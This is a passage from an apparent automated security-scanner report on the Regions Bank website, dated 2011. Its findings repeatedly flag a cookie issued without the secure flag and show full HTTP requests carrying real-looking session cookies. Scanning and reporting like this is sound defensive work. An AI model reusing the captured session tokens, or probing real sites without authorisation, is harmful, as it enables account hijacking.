GET /about_regions/economic_update.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/about_regions/economic_update.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/about_regions/economic_update.rf">here</a>.</h2>
</body></html>

10.95. https://www.regions.com/commercial_banking.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /commercial_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commercial_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.96. https://www.regions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 02:41:18 GMT
Accept-Ranges: bytes
ETag: "01bc2b791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:21 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

10.97. https://www.regions.com/img/btnDownArrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/btnDownArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/btnDownArrow.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0a255f791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:20 GMT


10.98. https://www.regions.com/img/btnRightArrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/btnRightArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/btnRightArrow.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 388
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0a255f791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

...[SNIP]...

10.99. https://www.regions.com/img/left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/left.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Thu, 02 Oct 2008 15:28:14 GMT
Accept-Ranges: bytes
ETag: "0fb457ca324c91:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:19 GMT


10.100. https://www.regions.com/img/logoRegions_213x45.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/logoRegions_213x45.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/logoRegions_213x45.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 6788
Content-Type: image/gif
Last-Modified: Tue, 26 May 2009 17:12:46 GMT
Accept-Ranges: bytes
ETag: "03b2a3025dec91:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:19 GMT

...[SNIP]...

10.101. https://www.regions.com/js/loadMedia.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/loadMedia.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loadMedia.js HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Mar 2010 14:18:12 GMT
Accept-Ranges: bytes
ETag: "0aa72d7a5c6ca1:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Length: 18069

...// (1) browser vendor:
// is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV
// (2) browser version number:
// is_major (integer indicating major version
...[SNIP]...

10.102. https://www.regions.com/js/wtbase.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: application/x-javascript
Last-Modified: Thu, 06 Nov 2008 18:55:36 GMT
Accept-Ranges: bytes
ETag: "0c4bd404140c91:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...

10.103. https://www.regions.com/mortgage.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /mortgage.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.104. https://www.regions.com/personal_banking/alternative_education_loans.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/alternative_education_loans.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/alternative_education_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/alternative_education_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/alternative_education_loans.rf">here</a>.</h2>
</body></html>

10.105. https://www.regions.com/personal_banking/auto_loans.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/auto_loans.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/auto_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/auto_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/auto_loans.rf">here</a>.</h2>
</body></html>

10.106. https://www.regions.com/personal_banking/cds.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/cds.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/cds.rf">here</a>.</h2>
</body></html>

10.107. https://www.regions.com/personal_banking/checking.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/checking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/checking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/checking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/checking.rf">here</a>.</h2>
</body></html>

10.108. https://www.regions.com/personal_banking/credit_cards.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/credit_cards.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/credit_cards.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/credit_cards.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/credit_cards.rf">here</a>.</h2>
</body></html>

10.109. https://www.regions.com/personal_banking/ehl.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/ehl.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/ehl.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/ehl.rf">here</a>.</h2>
</body></html>

10.110. https://www.regions.com/personal_banking/email_starting_net.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/email_starting_net.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/email_starting_net.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 178

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/email_starting_net.rf">here</a>.</h2>
</body></html>

10.111. https://www.regions.com/personal_banking/everyday_banking.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/everyday_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/everyday_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/everyday_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/everyday_banking.rf">here</a>.</h2>
</body></html>

10.112. https://www.regions.com/personal_banking/get_started_online_statements.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/get_started_online_statements.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/get_started_online_statements.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/get_started_online_statements.rf">here</a>.</h2>
</body></html>

10.113. https://www.regions.com/personal_banking/home_equity_main.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/home_equity_main.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/home_equity_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/home_equity_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/home_equity_main.rf">here</a>.</h2>
</body></html>

10.114. https://www.regions.com/personal_banking/insurance.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/insurance.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/insurance.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/insurance.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/insurance.rf">here</a>.</h2>
</body></html>

10.115. https://www.regions.com/personal_banking/investing.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/investing.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/investing.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/investing.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/investing.rf">here</a>.</h2>
</body></html>

10.116. https://www.regions.com/personal_banking/loan_payment_hardship.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/loan_payment_hardship.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/loan_payment_hardship.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
